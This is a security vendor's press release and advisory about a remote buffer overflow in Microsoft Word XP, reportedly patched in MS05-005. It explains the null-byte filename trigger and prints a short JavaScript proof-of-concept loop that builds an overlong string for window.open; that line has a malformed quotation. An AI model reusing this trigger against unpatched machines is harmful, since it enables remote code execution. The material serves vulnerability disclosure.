Finjan, the leading provider of proactive secure content management solutions for businesses of all sizes, today announced it has jointly worked with Microsoft to fix a highly dangerous vulnerability discovered by Finjan’s Malicious Code Research Center in Microsoft Word XP.

“By researching novel trends in the IT security field, Finjan’s Malicious Code Research Center (MCRC) continues to stay at the front of security research” says Shlomo Touboul, CEO and founder of Finjan Software “We have worked in collaboration with Microsoft to fix this security hole as we do in other cases in order to enhance the overall security of the Internet”.

Finjan has provided Microsoft with full technical details concerning this vulnerability and has been assisting Microsoft to patch it. Microsoft has released a patch, which can be found at this link: http://www.microsoft.com/technet/security/Bulletin/MS05-005.mspx

This vulnerability involves an improper filtering of input by Microsoft Word XP and could have been exploited by hackers to remotely take over users’ machines by simply luring the users to browse a malformed web page.

Full technical details about this vulnerability appear below. In addition, these details were published today by Finjan in several online security listings.

Finjan Customers are Proactively Protected against These Threats

Finjan enterprise customers using the latest releases of Finjan’s Vital Security™ products, and Finjan’s small and medium sized customers using the recently released 1Box™ Series are proactively protected against these vulnerabilities, as well as against other, not yet discovered ones.

About MCRC

Malicious Code Research Center (MCRC) is the leading research department at Finjan Software, dedicated to the research and detection of potential Internet and e-mail attacks. MCRC’s goal is to continue to be steps ahead of hackers attempting to exploit open platforms and technologies to develop next generation mobile malicious code, worms, Trojans, viruses and spyware. MCRC researchers also contribute to the development of next generation defense tools for Finjan’s proactive secure content management solutions.  For more information, visit http://www.finjan.com/mcrc/.  This specific vulnerability was discovered by Mr. Rafel Ivgi, a Security Researcher with Finjan's MCRC department.

About Finjan
Finjan Software is the leading provider of proactive, behavior-based secure content management solutions, protecting more than 2 million users from attack.  Finjan surpasses the levels of defense typically offered by reactive anti-virus software solutions. Finjan uses its Vital Security™ platform to determine actual code behavior and blocks any action that violates predefined security policy. This superior technology enables Finjan to protect users proactively by responding to existing, and more importantly, yet to be developed attacks. Analyst firm IDC, recognizes Finjan as the leader in the worldwide malicious mobile code security market.

Finjan and Finjan logo are trademarks or registered trademarks of Finjan Software, Inc., and/or its subsidiaries.  All other registered and unregistered trademarks in this document are the sole property of their respective owners.

Media Contacts

Jonathan Shillington / Blanaid Colley

The Global Consulting Group

+44 (0) 20 7796 4133

jshillington@hfgcg.com; colleyb@ergo-c.com

Technical Section

Finjan Security Advisory

Microsoft Office XP Remote Buffer Overflow Vulnerability

Introduction

Finjan has discovered a new vulnerability in Microsoft Word XP that would allow a hacker to launch a buffer overflow attack. This attack could occur when a user opened a Word document using Internet Explorer.

Technical Description

When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP "takes over" and opens that file. The problem appears upon sending a doc file request that contains a null byte (parser) at the end of the doc filename.

For example:

http://www.myhost.com/myfile.doc is a valid request.

However This:

http://www.myhost.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...aa.doc is an invalid request. Such a request will be sent to the server hosting the doc file.

Most servers like IIS and Apache will truncate the characters before the %00 while sending the filename to Internet Explorer.

At this stage, Internet Explorer will hand over the string to Microsoft Word XP, which will now receive a long string. This string causes an exploitable buffer overflow, allowing remote code execution.

The Code (Proof of Concept)

<script>

var mylongstring,myjunk;

mylongstring ="";

myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";

for(c=1;c<5000;c++)

{

  mylongstring = mylongstring + myjunk;

}

window.open(http://www.hhs.gov/ocr/privacysummary.rtf%0a0 + mylongstring");

</script>

Vulnerability Status

Microsoft was notified on July 13, 2004.

The bug is now fixed. For further details, please refer to Microsoft security bulletin MS05-005.

Credit

Rafel Ivgi, Malicious Code Research Center (MCRC), Finjan Software Ltd.

[top]